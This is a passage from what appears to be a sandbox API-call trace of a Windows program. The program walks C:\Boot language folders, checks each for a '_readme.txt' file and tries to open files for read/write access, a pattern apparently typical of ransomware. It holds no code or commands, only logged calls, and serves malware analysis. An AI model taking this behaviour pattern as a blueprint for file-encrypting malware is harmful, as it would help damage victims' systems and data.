[0146.718] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.718] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.718] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.718] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.718] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.718] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.718] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.718] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.718] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.718] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.718] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.718] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.718] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.718] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.718] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.718] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.718] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.718] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.718] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.718] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.718] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.718] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.718] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.718] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.718] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.718] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.718] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.719] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.719] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.719] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.719] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.719] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.719] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.719] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.719] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.719] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.719] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.719] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.719] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.719] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.719] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.719] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.720] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.720] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.720] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.720] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.720] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0146.720] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.720] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.720] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.720] PathFindFileNameW (pszPath="") returned="" [0146.720] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.721] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.721] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.721] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.721] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.721] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.721] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.721] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0146.721] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0146.721] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.721] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.721] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.721] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.721] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.722] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned=".mui" [0146.722] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.722] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.722] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.722] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned=".txt" [0146.722] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.722] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.722] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.722] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.722] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.722] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.722] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.722] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.722] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.722] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.722] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.722] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.722] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.722] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.722] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.723] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.723] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.724] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.724] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0146.724] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.724] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.724] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.724] PathFindFileNameW (pszPath="") returned="" [0146.724] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.724] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.724] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.724] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.724] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.725] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.725] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.725] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.725] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0146.725] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.725] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0146.725] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.725] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.725] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.725] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.725] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.725] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned=".mui" [0146.725] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.726] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaad5d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.726] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.726] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.726] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned=".txt" [0146.726] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaad5d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.726] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.726] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.726] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.726] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.726] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.726] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.726] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.726] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.726] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.726] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.726] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.726] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.726] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.726] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.726] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.726] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.727] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.727] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.727] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.727] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.727] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.727] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.727] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.727] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.727] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.727] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.727] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.727] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.727] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.727] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.727] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.728] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.728] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: 